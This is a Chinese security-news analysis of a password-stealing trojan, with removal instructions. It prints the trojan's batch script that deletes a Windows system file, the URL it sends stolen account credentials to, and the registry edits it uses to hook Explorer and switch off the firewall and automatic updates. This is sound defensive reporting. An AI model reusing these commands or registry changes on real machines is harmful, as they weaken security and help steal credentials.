网络安全 频道

Trojan-PSW病毒分析清除

    【IT168 专稿】

    病毒名称: 特洛伊盗号木马
    病毒类型:盗号木马
    文件MD5: 56E146754050E7D5FFA49715DC2C2670
    公开范围:完全公开
    危害等级: 4
    文件长度:16,142 字节
    脱壳后: 282,972 字节
    感染系统: Windows98以上版本
    加壳类型:Upack 0.3.9 beta2s -> Dwing [Overlay]

    病毒描述
    首先删除微软的系统文件verclsid.exe,然后在fonts目录下释放病毒文件。rsjzbsp.exe文件为病毒主体,rsjzbpm.dll为进程注入,  保护rsjzbsp.exe文件以免被直接删除。Gejibnd.fon为加密的url地址,rsjzbfg.dll文件为明文的url地址。

    行为分析-本地行为

    1、在c盘下创建DFD490781.bat批处理文件,其作用为实现删除verclsid.exe。内容如下:
    @echo off
    :Loop 
    attrib "C:\WINDOWS\system32\verclsid.exe" -r -a -s -h
    del "C:\WINDOWS\system32\verclsid.exe"
    if exist "C:\WINDOWS\system32\verclsid.exe" goto Loop
    del %0

    2、在c:\windows\fonts下面释放gejibnd.fon、rsjzbfg.dll、rsjzbpm.dll和rsjzbsp.exe文件。

    3、取得帐户和密码后将发到下面的地址:http://www.ads183.com/buguale/wx/post.asp

    4、修改下列注册表:
    [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{22FAACDE-34DA-CCD4-AB4D-DA34485A3422}\InprocServer32]

    @="C:\\WINDOWS\\Fonts\\rsjzbpm.dll"

    "ThreadingModel"="Apartment"

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]

    "{22FAACDE-34DA-CCD4-AB4D-DA34485A3422}"="rsjzbpm.dll" \\执行挂钩

    [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU]

    "NoAutoUpdate"=dword:00000001 \\关闭自动更新

    "AUOptions"=dword:00000001

    [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]

    "EnableFirewall"=dword:00000000 \\关闭防火墙

    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]

    "EnableFirewall"=dword:00000000

    清除方案

    1、结束rsjzbsp.exe进程

    2、删除注册表项
    HKEY_CLASSES_ROOT\CLSID\{22FAACDE-34DA-CCD4-AB4D-DA34485A3422}
    HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\CLSID\{22FAACDE-34DA-CCD4-AB4D-DA34485A3422} 
   HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\SHELLEXECUTEHOOKS\{22FAACDE-34DA-CCD4-AB4D-DA34485A3422}

    3、重命名并重启计算机删除fonts下面的gejibnd.fon、rsjzbfg.dll、rsjzbpm.dll和rsjzbsp.exe文件。
 
    4、修改被篡改的注册表项,开启防火墙和自动更新

0
相关文章